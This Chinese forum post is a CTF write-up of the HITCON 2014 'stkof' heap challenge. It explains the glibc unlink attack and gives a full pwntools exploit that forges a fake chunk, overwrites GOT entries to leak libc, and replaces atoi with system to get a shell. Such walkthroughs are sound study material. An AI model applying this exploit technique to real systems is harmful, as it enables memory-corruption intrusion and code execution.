首页
社区
课程
招聘
[原创]Pwn堆利用学习——Unlink —— 2014_hitcon_stkof
发表于: 2020-11-24 14:30 8860

[原创]Pwn堆利用学习——Unlink —— 2014_hitcon_stkof

2020-11-24 14:30
8860

image-20201123102330429

image-20201123103008281

image-20201123103043095

验证第1个chunk的index为1

image-20201123111813609

image-20201123104813479

image-20201123104851094

image-20201123104910209

image-20201124094445306

思路

image-20201124093256371

通过unlink漏洞把这三个函数got表项地址写入globals数组中。

image-20201124093317960

通过fill函数,往globals[0]指向的地址里写入数据,即往free@got里写入puts@plt。

思路就是上面所说的。那么现在还有个问题。怎么利用unlink修改globals数组?

我们先来回顾一下unlink漏洞

unlink: 当前释放的chunk与前一个或者后一个空闲chunk进行合并时,会先把空闲chunk从bin中移除,移除过程使用unlink宏来实现。

unlink漏洞:若chunk a存在堆溢出漏洞(data内容可控且无输入长度限制)覆盖到chunk b,在chunk a的data处创建fake free chunk,并更改chunk b的结构中的前两个属性,prev_sizesize里的P位标志。

P位标志置零使上一个chunk a被认为是free chunk,Free(b)时会触发向后合并。

prev_size被改写,向后合并时会找到fake free chunk。

unlink安全检查

image-20201124105123556

image-20201124105312274

现在思路已经清晰了,按照思路边调试边写exp就OK啦!

我做题的时候突然想到,修改程序流程的时候,我们一直都是改got表项内容,能不能直接改plt表项呢?也就是能不能直接把要跳转的地址覆盖plt表项?(还是想得少)

不能。因为plt节在内存中是属于只读代码段的,没有写权限。比如这题的free函数:

image-20201123182158070

a. 编写模板和选项函数

a. 先malloc三个chunk看看,chunk1用于io缓冲区,chunk2和chunk3连续,准备溢出chunk2。

image-20201124113808148

b. 在chunk2 中伪造free chunk,修改chunk3的prev_size和size。

我这里是把fake free chunk的大小伪造成了0x30,也就是chunk2的user data部分大小,然后再修改chunk3的prev_size为0x30来绕过unlink的第一个大小检查。

而ctfwiki中是伪造成0x20,然后紧接在后面又伪造一个只有prev_size域的chunk。

image-20201124133919987

c. unlink,使得golbal[2] = &(global[2]) - 0x18,那么fill(2)就会从&(global[2]) - 0x18这个地址开始写数据,而且没有长度限制。

image-20201124134706610

d. 将函数freeputs,atoi的got地址写入globals数组中,然后将puts@plt写入free@got中。

image-20201124140110853

e. 泄漏puts函数真实地址,然后计算libc、system函数地址。free(global[1]) == puts(puts@got)

image-20201124141416019

f. 利用fill函数修改atoi@got为system地址

关掉调试信息,结果如下图所示,需要从第2次输入shell命令才能正确回显结果。

image-20201124141704859

HITCON 2014 stkof Writeup(Unlink)

stkof题目github地址

lzx@ubuntu16x64:2014_hitcon_stkof$ file stkof
stkof: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/23_11-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4872b087443d1e52ce720d0a4007b1920f18e7b0, stripped
lzx@ubuntu16x64:2014_hitcon_stkof$ checksec --file=stkof
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH    Symbols        FORTIFY    Fortified    Fortifiable    FILE
Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   No Symbols      No    0        3        stkof
lzx@ubuntu16x64:2014_hitcon_stkof$ file stkof
stkof: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/23_11-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4872b087443d1e52ce720d0a4007b1920f18e7b0, stripped
lzx@ubuntu16x64:2014_hitcon_stkof$ checksec --file=stkof
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH    Symbols        FORTIFY    Fortified    Fortifiable    FILE
Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   No Symbols      No    0        3        stkof
 
 
 
 
if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))
      malloc_printerr ("corrupted size vs. prev_size");
if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))
      malloc_printerr ("corrupted size vs. prev_size");
// malloc.c中unlink宏部分源码
FD = P->fd;                                     
BK = P->bk;                                     
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))             
        malloc_printerr (check_action, "corrupted double-linked list", P);    
    else {                                     
        FD->bk = BK;                                 
        BK->fd = FD;
          ......
    }
// malloc.c中unlink宏部分源码
FD = P->fd;                                     
BK = P->bk;                                     
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))             
        malloc_printerr (check_action, "corrupted double-linked list", P);    
    else {                                     
        FD->bk = BK;                                 
        BK->fd = FD;
          ......
    }
根据FD->bk == p->fd->bk == p 推导公式如下:
 
fake chunk->fd->bk == fake chunk
 => *(fake chunk->fd + 0x18) == fake chunk
 => *(fake chunk->fd + 0x18) == globals[index]
 => (fake chunk->fd + 0x18) == &globals[index]
 => (fake chunk->fd) == &globals[index] - 0x18
 => *(fake chunk + 0x10) == &globals[index] - 0x18
 
 
同理,根据BK->fd == p->bk->fd == p ,推导公式如下:
 
fake chunk->bk->fd == fake chunk
 => *(fake chunk->bk + 0x10) == fake chunk
 => *(fake chunk->bk + 0x10) == globals[index]
 => fake chunk->bk +0x10 = &globals[index]
 => fake chunk->bk = &globals[index] - 0x10
 => *(fake chunk +0x10) = &globals[index] - 0x10
根据FD->bk == p->fd->bk == p 推导公式如下:
 
fake chunk->fd->bk == fake chunk
 => *(fake chunk->fd + 0x18) == fake chunk
 => *(fake chunk->fd + 0x18) == globals[index]
 => (fake chunk->fd + 0x18) == &globals[index]
 => (fake chunk->fd) == &globals[index] - 0x18
 => *(fake chunk + 0x10) == &globals[index] - 0x18
 
 
同理,根据BK->fd == p->bk->fd == p ,推导公式如下:
 
fake chunk->bk->fd == fake chunk
 => *(fake chunk->bk + 0x10) == fake chunk
 => *(fake chunk->bk + 0x10) == globals[index]
 => fake chunk->bk +0x10 = &globals[index]
 => fake chunk->bk = &globals[index] - 0x10
 => *(fake chunk +0x10) = &globals[index] - 0x10
 
from pwn import  *
from LibcSearcher import LibcSearcher
from sys import argv
 
def ret2libc(leak, func, path=''):
    if path == '':
        libc = LibcSearcher(func, leak)
        base = leak - libc.dump(func)
        system = base + libc.dump('system')
        binsh = base + libc.dump('str_bin_sh')
    else:
        libc = ELF(path)
        base = leak - libc.sym[func]
        system = base + libc.sym['system']
        binsh = base + libc.search('/bin/sh').next()
 
    return (system, binsh)
 
s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(delim, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(delim, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
uu64    = lambda data               :u64(data.ljust(8,'\0'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
 
context.log_level = 'DEBUG'
binary = './stkof'
context.binary = binary
elf = ELF(binary,checksec=False)
p = remote('127.0.0.1',0000) if argv[1]=='r' else process(binary)
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
#libc = ELF('./glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so',checksec=False)
libc = ELF('./libc.so.6',checksec=False)
 
def dbg():
    gdb.attach(p)
#    pause()
 
def create(size):
    sl(1)
    sl(size)
    ru('OK\n')
 
def delete(index):
    sl(3)
    sl(index)
 
def fill(index, size, content):
    sl(2)
    sl(index)
    sl(size)
    s(content)
    ru('OK\n')
 
def show(index): # useless
    sl(4)
    sl(index)
 
#start
 
# end
p.interactive()
from pwn import  *
from LibcSearcher import LibcSearcher
from sys import argv
 
def ret2libc(leak, func, path=''):
    if path == '':
        libc = LibcSearcher(func, leak)
        base = leak - libc.dump(func)
        system = base + libc.dump('system')
        binsh = base + libc.dump('str_bin_sh')
    else:
        libc = ELF(path)
        base = leak - libc.sym[func]
        system = base + libc.sym['system']
        binsh = base + libc.search('/bin/sh').next()
 
    return (system, binsh)
 
s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(delim, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(delim, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
uu64    = lambda data               :u64(data.ljust(8,'\0'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
 
context.log_level = 'DEBUG'
binary = './stkof'
context.binary = binary
elf = ELF(binary,checksec=False)
p = remote('127.0.0.1',0000) if argv[1]=='r' else process(binary)
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
#libc = ELF('./glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so',checksec=False)
libc = ELF('./libc.so.6',checksec=False)
 
def dbg():
    gdb.attach(p)
#    pause()
 
def create(size):
    sl(1)
    sl(size)
    ru('OK\n')
 
def delete(index):
    sl(3)
    sl(index)
 
def fill(index, size, content):
    sl(2)
    sl(index)
    sl(size)
    s(content)
    ru('OK\n')
 
def show(index): # useless
    sl(4)
    sl(index)
 
#start
 
# end
p.interactive()
# trigger to malloc buffer for io function
create(0x100)        # idx 1
create(0x30)         # idx 2
# small chunk size in order to trigger unlink
create(0x80)         # idx 3
# trigger to malloc buffer for io function
create(0x100)        # idx 1
create(0x30)         # idx 2
# small chunk size in order to trigger unlink
create(0x80)         # idx 3
 
# a fake chunk at global[2] = global0 + 16 who's size is 0x20
global0 = 0x602140
payload = p64(0)        #prev_size
payload += p64(0x30)    #size --> except the first line, the rest two line is equal to 0x20?
payload += p64(global0 + 16 - 0x18#fd
payload += p64(global0 + 16 - 0x10#bk
#payload += p64(0x20)  # next chunk's prev_size bypass the check
payload = payload.ljust(0x30, 'a')
# overwrite global[3]'s chunk's prev_size
# make it believe that prev chunk is at global[2]
payload += p64(0x30)        #0x30 is the fake chunk size
# make it believe that prev chunk is free
payload += p64(0x90)
fill(2, len(payload), payload)
# a fake chunk at global[2] = global0 + 16 who's size is 0x20
global0 = 0x602140
payload = p64(0)        #prev_size
payload += p64(0x30)    #size --> except the first line, the rest two line is equal to 0x20?
payload += p64(global0 + 16 - 0x18#fd
payload += p64(global0 + 16 - 0x10#bk
#payload += p64(0x20)  # next chunk's prev_size bypass the check
payload = payload.ljust(0x30, 'a')
# overwrite global[3]'s chunk's prev_size
# make it believe that prev chunk is at global[2]
payload += p64(0x30)        #0x30 is the fake chunk size
# make it believe that prev chunk is free
payload += p64(0x90)
fill(2, len(payload), payload)
 
# unlink fake chunk, so global[2] =&(global[2]) - 0x18 = global0 - 8
delete(3)
p.recvuntil('OK\n')
# unlink fake chunk, so global[2] =&(global[2]) - 0x18 = global0 - 8
delete(3)
p.recvuntil('OK\n')
 
# overwrite global[0] = free@got, global[1]=puts@got, global[2]=atoi@got
payload = 'a' * 8 + p64(elf.got['free']) + p64(elf.got['puts']) + p64(elf.got['atoi'])
fill(2, len(payload), payload)
# edit free@got to puts@plt
payload = p64(elf.plt['puts'])
fill(0, len(payload), payload)
# overwrite global[0] = free@got, global[1]=puts@got, global[2]=atoi@got
payload = 'a' * 8 + p64(elf.got['free']) + p64(elf.got['puts']) + p64(elf.got['atoi'])
fill(2, len(payload), payload)
# edit free@got to puts@plt
payload = p64(elf.plt['puts'])
fill(0, len(payload), payload)
 
#free global[1] to leak puts addr
delete(1)
puts_addr = ru('\nOK\n')
puts_addr = uu64(puts_addr)
leak('puts addr: ' ,puts_addr)
libc_base = puts_addr - libc.symbols['puts']
binsh_addr = libc_base + next(libc.search('/bin/sh'))
system_addr = libc_base + libc.symbols['system']
leak('libc base: ' , libc_base)
leak('/bin/sh addr: ', binsh_addr)
leak('system addr: ',system_addr)
dbg()
#free global[1] to leak puts addr
delete(1)
puts_addr = ru('\nOK\n')
puts_addr = uu64(puts_addr)
leak('puts addr: ' ,puts_addr)
libc_base = puts_addr - libc.symbols['puts']
binsh_addr = libc_base + next(libc.search('/bin/sh'))
system_addr = libc_base + libc.symbols['system']
leak('libc base: ' , libc_base)

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

上传的附件:
收藏
免费 1
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//